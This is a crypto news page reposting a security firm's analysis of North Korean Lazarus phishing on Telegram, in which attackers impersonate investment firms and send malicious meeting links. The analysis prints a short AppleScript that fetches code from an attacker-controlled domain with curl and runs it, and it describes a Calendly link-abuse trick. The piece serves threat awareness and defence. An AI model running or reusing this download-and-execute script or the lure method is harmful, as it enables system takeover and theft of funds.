今日运势评分

-3

本月运势

癸未月

震荡偏多

甲克戊,申金生水
癸不词讼理弱敌强
未不服药毒气入肠

祭祀,出行,交易,割蜜,造畜稠

嫁娶,作灶,安葬,动土,词讼,作梁,伐木,掘井,破土,移徙

月相

寝待

底部反弹

日冲

Powered by RitMEX

TRUMP9.74 -0.33%

SUI3.95 14.58%

TON3.02 0.36%

TRX0.30 0.08%

DOGE0.21 3.42%

XRP2.98 6.84%

SOL166.55 2.77%

BNB704.22 1.90%

ETH3052.54 2.93%

BTC121405.85 2.79%

ETH Gas3.27 Gwei

贪婪
74

慢雾:朝鲜黑客 Telegram 定点欺诈攻击分析

朝鲜黑客开始冒充知名投资机构,对项目方进行欺诈钓鱼,影响范围较大。

撰文: 23pds@慢雾安全团队

背景

早在 2022 年,慢雾安全团队就通过慢雾 BTI 情报网络发现朝鲜黑客 Lazarus 团伙开启针对加密货币行业的大规模 Telegram 欺诈钓鱼行动,近期朝鲜黑客更是开始冒充知名投资机构,对项目方进行欺诈钓鱼,鉴于影响范围较大,慢雾在此进行分析。

技战法

一、挑选知名投资机构作为冒充对象,然后建立虚假的 Telegram 帐号:

二、寻找知名的 DeFi 项目方作为目标,以要投资他们为名,使用虚假帐号开始实施骗局:

朝鲜黑客会先对目标发起聊天以建立联系,如果项目方看到消息且安全意识不足,就会出现下图的一幕:

朝鲜黑客骗取项目方的信任后便开始约会议,此处有两种攻击手法:

1. 邀请项目方加入如 ***.group-meeting.team 之类的会议,假装询问对方是否有时间安排会面或详谈,并主动提供恶意会议链接。项目方点击链接后会看到地区访问限制,这时朝鲜黑客会接着诱使项目方下载并运行其提供的“修改定位”的恶意脚本。一旦项目方照做,那么他的电脑就会被朝鲜黑客控制,导致资金被盗取。下面是恶意脚本 IP_Request.scpt 的内容:

set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"

set sc to do shell script "curl -L -k""& fix_url &"\""

run script sc

代码解释:

2. 利用 Calendly 会议预定系统的「添加自定义链接」在事件页面的功能,在事件上插入恶意链接发起钓鱼攻击。由于 Calendly 与大多数项目方的日常工作背景很好地融合在一起,因此这些恶意链接不容易引起怀疑,项目方容易无意中点击恶意链接,下载并执行恶意代码,此时朝鲜黑客同样可以获取到项目方系统相关信息或权限。

慢雾安全团队在 2023 年 11 月 30 日 也对相关攻击手法做过提醒:

基础 IOC:

IP: 104.168.137.21

Domains:

恶意攻击样例:

总结

鉴于此类诈骗行为仍在持续发生,建议 Web3 用户务必确保在添加好友时通过双重渠道确认对方的真实性,同时对 Telegram 开启双重身份验证(2FA),随时注意交易安全,以免遭受资金损失。

一旦不慎运行相关木马,请第一时间转移相关资金、断网杀毒,同时修改目标电脑上(包括浏览器里记录的)相关账号密码等信息。

欢迎加入深潮TechFlow官方社群

Telegram订阅群:https://t.me/TechFlowDaily
Twitter官方账号:https://x.com/TechFlowPost
Twitter英文账号:https://x.com/BlockFlow_News
作者慢雾科技@SlowMist_Team
相关文章
2025.06.23 - 21 天前
加密货币市场的隐藏风险:如果 Telegram 停摆会发生什么?
减少过度依赖和实现平台多元化不再是可选项,它是一种必要的生存策略。
2025.06.20 - 24 天前
Telegram 创始人的「DNA 空投」,年仅 40 已立下百子遗嘱
这是 Pavel Durov 接受的最长专访,一场关于政治、权力和民主的访谈。
2025.06.19 - 25 天前
TAC 融资 1150 万美元,旨在将 DeFi 带入 Telegram 的十亿用户生态系统
TAC 通过将以太坊 dApps 带入 Telegram 和 TON,正在为用户提供新的机会,推动 DeFi 的普及。
2025.06.13 - 31 天前
Telegram Gift 蹿红,比之前的 NFT 强在哪里?
最好的用户体验能为用户创造最大的价值。
2025.06.12 - 32 天前
无人关注的 TON,正在靠 NFT 翻身
Telegram 也开始炒「QQ 秀」了?
2025.05.30 - 45 天前
Telegram 拟发行 15 亿美元债券,将集成马斯克旗下 xAI 并获得股份和订阅分成
虽然创始人 Pavel Durov 仍在法国被「禁足」,但 Telegram 仍赢得投资者的支持。
2025.03.21 - 115 天前
Telegram 创始人重获自由身,TON 官宣 4 亿美金融资,发展困局或迎转机
单一的叙事逻辑、资源分配的失衡、外部事件的冲击以及市场周期的波动,TON生态陷入了阵痛期。
2025.03.18 - 118 天前
离开 Telegram 小游戏的人
Telegram 小游戏的兴衰并不是一个独立现象,它只是整个 Web3 行业的一种极端「缩影」。
2025.03.17 - 119 天前
加密早报:Telegram 创始人获准离开法国前往迪拜,本周 FTN、IMX、ENA 及 APE 等代币将于迎来大额解锁
Meme 币与非 Meme 币市值比例已由去年11月峰值的 9% 降至如今的 5.67%。
2024.11.21 - 235 天前
成也用户,败也用户,我们还要在 Telegram 做增长吗?
本文将从 Telegram 近期发展的角度试图分析未来在 Telegram/TON 上做增长的有效路径。